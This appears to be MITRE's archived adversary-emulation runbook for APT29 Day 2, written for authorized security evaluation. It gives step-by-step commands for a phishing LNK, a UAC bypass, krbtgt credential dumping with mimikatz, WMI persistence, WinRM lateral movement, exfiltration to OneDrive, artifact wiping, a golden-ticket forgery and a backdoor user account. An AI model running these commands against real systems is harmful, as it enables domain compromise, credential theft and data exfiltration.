# APT29 Day 2 (Steps 11 through 20) (ARCHIVED)


# Acknowledgements

# Special thanks to the following public resources:

# Overview

  • Emulation of APT29 usage of tools such as PowerDuke, POSHSPY, CloudDuke, as well as more recent (2016+) TTPs
  • Scenario begins with a target spearphishing leading into a low and slow, methodical approach to owning the initial target and eventually the entire domain
  • Includes establishing persistence, credential gathering, local and remote enumeration, and data exfil
  • Modular components (ex: PowerShell scripts) may be executed atomically

# Requirements

# Victim Systems:

  1. 3 targets
    • 1 domain controller and 2 workstations
    • All Windows OS (tested and executed against Win10 1903)
    • Domain joined with at least 2 accounts (domain admin and another user)
  2. Microsoft Outlook must be available locally on one of the victim workstations

# Red Team Systems:

  1. Server running an offensive framework (we tested and executed using PoshC2 -- https://github.com/nettitude/PoshC2) capable of:
    • Executing native PowerShell commands
    • Loading and executing PowerShell scripts (.ps1)
    • Generating a DLL payload and an encoded PowerShell oneliner
    • Receiving and maintaining multiple callbacks at once
  2. Online OneDrive Account (https://onedrive.live.com/)

# Red Team Setup

# Generate an encoded PowerShell oneliner payload, then copy:

  1. Just the encoded portion (ex: WwBTAH...=) into $enc_ps variable (4th line from bottom) in schemas.ps1
    • ex: $enc_ps = "WwBTAH...=="
  2. The entire value (ex: powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...=) into CommandLineTemplate variable (under $ConsumerArgs in 2nd paragraph) in stepFifteen_wmi.ps1
    • ex: CommandLineTemplate="powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...="
  3. The entire value (ex: powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...=) into -Value variable (2nd line) in stepFourteen_bypassUAC.ps1
    • ex: New-Item -Force -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Value "powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAH...="

# Generate DLL payload, then on a separate Windows host:

  1. [CMD] > certutil -encode [file].dll blob
  2. [CMD] > powershell
  3. [PS] > $blob = (Get-Content .\blob) -join ""; $blob > .\blob
  4. Open blob file in text editor
  5. Delete new line at end of file and copy all (CTRL-A, CTRL-C)
  6. Paste value (ex: -----BEGIN CERTIFICATE-----...-----END CERTIFICATE-----) into $bin variable (6th line) in schemas.ps1

# Copy payloads to C2 server (wherever is appropriate for your C2 framework to have access to these files)

# Update stepFourteen_credDump.ps1 -- directions are in file

# Prepare initial access payloads:

  1. Login as non-domain admin user
  2. Copy over the following files onto the Desktop of the initial victim:
    1. 2016_United_States_presidential_election_-_Wikipedia.html
    2. make_lnk.ps1
    3. schemas.ps1
  3. Copy over MITRE-ATTACK-EVALS.HTML into the Documents folder of the initial victim
  4. Execute make_lnk.ps1 (Right click > Run with PowerShell), this will generate 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk
  5. Drag make_lnk.ps1 and schemas.ps1 to Recycle Bin and empty the Recycle Bin (Right click > Empty Recycle Bin)

# Victim Setup

# For each of the 3 victims:

  1. Login in as domain admin user
  2. Ensure Windows Defender is off or configured to alert-only (https://support.microsoft.com/en-us/help/4027187/windows-10-turn-off-antivirus-protection-windows-security)
  3. Change network type to Domain (https://www.itechtics.com/change-network-type-windows-10/#2-_Setting_network_type_using_Windows_Registry)
  4. Set UAC to never notify (https://articulate.com/support/article/how-to-turn-user-account-control-on-or-off-in-windows-10)
  5. Enable WinRM (https://support.microsoft.com/en-us/help/555966)
  6. Enable UseLogonCredential in the WDigest Registry settings (https://support.microsoft.com/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a)

# For the initial victim (the workstation with Microsoft Outlook):

  1. Login as non-domain admin user
  2. Enable programatic access to Microsoft Outlook (https://www.slipstick.com/developer/change-programmatic-access-options/)
  3. Open Outlook and sign in if necessary

# Beginning of Day2 Execution

# Step 11 - Initial Breach

# 11.A

  1. As non-domain admin user, execute 37486-the-shocking-truth-about-election-rigging-in-america.rtf.lnk (double click), output will display in terminal
  2. You will now receive a new, low integrity callback

# Step 12 - Fortify Access

# 12.A

  1. Load timestomp.ps1
  2. Execute timestomp C:\Users\oscar\AppData\Roaming\Microsoft\kxwn.lock

# 12.B

  1. Load stepTwelve.ps1
  2. Execute detectav

# 12.C

  1. Execute software

# Step 13 - Local Enumeration

# 13.A

  1. Load stepThirteen.ps1
  2. Execute comp

# 13.B

  1. Execute domain

# 13.C

  1. Execute user

# 13.D

  1. Execute pslist

# Step 14 - Elevation

# 14.A

  1. Load stepFourteen_bypassUAC.ps1
  2. Execute bypass
  3. You will now receive a new, high integrity callback

# 14.B

  1. Go to where m.exe is on C2 server in another terminal
  2. Confirm m.exe is there and is a Windows PE ($ file m)
  3. Host file on port 8080 ($ sudo python -m SimpleHTTPServer 8080)
  4. Interact with new callback
  5. Load stepFourteen_credDump.ps1
  6. Execute wmidump
  7. Kill the python server (CTRL-C) once you see a GET request on the python server (VM terminal)

# Step 15 - Establish Persistence

# 15.A

  1. Load stepFifteen_wmi.ps1
  2. Execute wmi

Note: Do not RDP into the initial access from this point forward, you will trigger callbacks intended for step 20

# Step 16 - Lateral Movement

# 16.A

  1. Interact with low integrity callback
  2. Load powerView.ps1 (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
  3. Execute get-netdomaincontroller

# 16.B

  1. Load stepSixteen_SID.ps1
  2. Execute siduser
  3. Save the value for the domain SID (ex: S-1-5-21-2219224806-3979921203-557828661-1110) and delete the RID (ex: -1110) of the end (ex: S-1-5-21-2219224806-3979921203-557828661)

# 16.C

  1. Interact with high integrity callback
  2. Load Invoke-WinRMSession.ps1 (available at https://github.com/nettitude/PoshC2/blob/master/resources/modules/Invoke-WinRMSession.ps1)
  3. Execute invoke-winrmsession -Username "[insert domain admin username]" -Password "[insert domain admin password]" -IPAddress [insert domain controller IP]
  4. Output will tell you a session opened and give you the format for using it, ex: Session opened, to run a command do the following: Invoke-Command -Session $[session_id] -scriptblock {Get-Process} | out-string
  5. Save the value for the session_id (ex: $hzaqx)

Note: If you get an error here, reboot domain controller, then re-run the 2 winrm setup commands before re-executing 16.C

# 16.D

  1. Execute Copy-Item m.exe -Destination "C:\Windows\System32\" -ToSession $[session_id]
  2. Execute Invoke-Command -Session $[session_id] -scriptblock {C:\Windows\System32\m.exe privilege::debug "lsadump::lsa /inject /name:krbtgt" exit} | out-string
  3. Take note of value for the NTLM hash (ex: NTLM : f4a688010d80770a55a22893dc6ac510) near the top (Under RID and User after * Primary)
  4. Execute Get-PSSession | Remove-PSSession

# Step 17 - Collection

# 17.A

  1. Interact with low integrity callback
  2. Load stepSeventeen_email.ps1
  3. Execute psemail

# 17.B

  1. Interact with high integrity callback
  2. Execute New-Item -Path "C:\Windows\Temp\" -Name "WindowsParentalControlMigration" -ItemType "directory"
  3. Execute Copy-Item "C:\Users\oscar\Documents\MITRE-ATTACK-EVALS.HTML" -Destination "C:\Windows\Temp\WindowsParentalControlMigration"

# 17.C

  1. Load stepSeventeen_zip.ps1
  2. Execute zip C:\Windows\Temp\WindowsParentalControlMigration.tmp C:\Windows\Temp\WindowsParentalControlMigration

# Step 18 - Exfiltration

# 18.A

  1. Get CID for OneDrive account (https://www.laptopmag.com/articles/map-onedrive-network-drive)
  2. Execute net use y: https://d.docs.live.net/[CID] /user:[OneDrive account]@outlook.com "[OneDrive password]"
  3. Execute Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "Y:\WindowsParentalControlMigration.tmp"
  4. Login to https://onedrive.live.com/?id=root&cid=[CID] to see exfil (WindowsParentalControlMigration.tmp)

# Step 19 - Clean UP

# 19.A

  1. Load wipe.ps1
  2. Execute wipe "C:\Windows\System32\m.exe"

Note: There's a known bug here with ETW (Invoke-ReflectivePEInjection patches a function on the fly that ETW invokes) so callback may die and hang

# 19.B

  1. Execute wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"

# 19.C

  1. Execute wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"

# Step 20 - Leverage Persistence

# 20.A

  1. Execute restart-computer -force
  2. Existing 2 callbacks should die
  3. RDP and login to initial victim once it reboots
  4. Persistence mechanisms should fire on login (1 for DLL, 1 or more for WMI event subscription)

Note: You may need to repeat login process a few times (close and reopen RDP session) for WMI execute to fire

# 20.B

  1. Interact with the SYSTEM PS callback (from WMI)
  2. Execute klist purge
  3. Load Invoke-Mimikatz.ps1 (available at https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1)
  4. Execute invoke-mimikatz -command '"kerberos::golden /domain:dmevals.local /sid:[SID] /rc4:[NTLM HASH] /user:mscott /ptt"' using the SID and NTLM values from earlier
  5. Execute klist and confirm ticket is in cache
  6. Execute Enter-PSSession [hostname of second workstation in domain]
  7. Execute Invoke-Command -ComputerName [hostname of second workstation in domain] -ScriptBlock {net user /add toby "pamBeesly<3"}

# Liability / Responsible Usage

This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.

# Notice

Copyright 2020 The MITRE Corporation

Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2.

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Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

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